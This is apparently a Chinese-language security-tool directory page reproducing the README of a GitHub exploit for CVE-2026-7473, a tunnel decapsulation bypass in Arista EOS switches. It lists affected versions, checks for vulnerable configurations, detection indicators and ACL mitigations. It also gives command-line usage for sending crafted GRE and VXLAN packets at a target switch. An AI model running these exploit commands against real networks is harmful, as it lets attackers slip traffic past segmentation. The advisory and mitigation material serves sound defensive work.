Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-7473---Arista-EOS-Tunnel-Decapsulation-Bypass — 漏洞:在受影响的 Arista EOS 平台上,启用了隧道解封装功能 | Kitploit
工具/GitHubGitHub/fevar54/cve-2026-7473---arista-eos-tunnel-decapsulation-bypass
漏洞分析漏洞利用配置审计网络安全渗透测试学习与教育
GitHubfevar54/cve-2026-7473---arista-eos-tunnel-decapsulation-bypass

CVE-2026-7473---Arista-EOS-Tunnel-Decapsulation-Bypass

漏洞:在受影响的 Arista EOS 平台上,启用了隧道解封装功能

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
133个月前尚未审核
分享

CVE-2026-7473 - Arista EOS 隧道解封装绕过漏洞

Security Rating CVSS CISA KEV

⚠️ 警告

此代码仅用于教育目的和授权的安全测试。

📋 描述

CVE-2026-7473 是 Arista EOS 中的一个漏洞,当交换机被配置为隧道端点(VXLAN、GRE、decap-groups)时,会错误地解封装并转发目的IP与已配置的解封装IP匹配的意外隧道数据包。这是因为交换机未验证隧道的协议类型(CWE-1023)。

技术细节

字段值
CVECVE-2026-7473
CVSS v3.15.8(中危)
CVSS v4.06.8
向量AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
CWE1023 - 缺少因素的不完整比较

🎯 受影响版本和平台

受影响的 EOS 版本

Train状态
4.36.x受影响
4.35.x受影响
4.34.x受影响
4.33.x受影响
4.32.x受影响
4.31.x受影响
4.30.x受影响
< 4.30.x受影响

受影响平台

系列暴露程度
7020R 系列完全受影响
7280R/R2 系列完全受影响
7500R/R2 系列完全受影响
7280R3 系列有限暴露(IP-in-IPv6, GUEv6)
7500R3 系列有限暴露(IP-in-IPv6, GUEv6)
7800R3 系列有限暴露(IP-in-IPv6, GUEv6)

🔧 利用所需配置

如果满足以下条件,设备存在漏洞:

  1. 配置为隧道端点,具有解封装IP
  2. 具有 VXLAN VTEP、GRE 隧道端点或 ip decap-group

检查易受攻击的配置

root@kitploit:~
# 检查 VXLAN VTEP
show interfaces vxlan 1

# 检查 GRE 隧道
show interfaces Tunnel0

# 检查 decap-groups
show ip decap-group
🚀 使用方法
安装
bash
git clone https://github.com/username/CVE-2026-7473-Arista-EOS-Tunnel-Bypass
cd CVE-2026-7473-Arista-EOS-Tunnel-Bypass
pip install -r requirements.txt
扫描易受攻击的配置
bash
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --check-config
向 VXLAN 交换机发送 GRE
bash
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --exploit vxlan-gre
向 GRE 交换机发送 VXLAN
bash
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --exploit gre-vxlan
发送所有绕过类型
bash
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --exploit all
📊 利用矩阵
配置	意外流量	是否解封装?
VXLAN IPv4	GRE	✅ 是
VXLAN IPv4	IPoIP	✅ 是
GRE IPv4	VXLAN	✅ 是
GRE IPv4	IPoIP	✅ 是
GRE Decap Group	IPoIP	✅ 是
GUE Decap Group	GRE, IPoIP	✅ 是
IP-in-IP Decap Group	GRE, NVGRE, VXLAN	✅ 是
🔍 入侵指标(IOCs)
在交换机上监控
bash
# 检查 ACL 计数器
show mac access-lists bar

# 查找意外流量
show log | grep -E "GRE|VXLAN|GUE|unexpected"
在网络上
隧道流量出现在意外的内部网段

仅配置了 VXLAN 时出现 GRE 数据包

仅配置了 GRE 时出现 VXLAN 数据包

🛡️ 缓解措施
选项 1 - 上游交换机的 ACL(推荐)
bash
# 示例:仅允许 VXLAN
ip access-list foo
   counters per-entry
   1 permit udp any host <vxlan-decap-ip> eq 4789
   2 deny ip any host <decap-ip>
   3 permit ip any any
选项 2 - 解封装交换机的 ACL(复杂)
需要更新 TCAM profile

请联系 Arista TAC 获取协助

📚 参考
Arista Security Advisory 0137

NVD - CVE-2026-7473

CISA KEV Catalog

⚖️ 免责声明
本软件按“原样”提供。作者不对滥用行为负责。请仅在授权系统上使用。
下载工具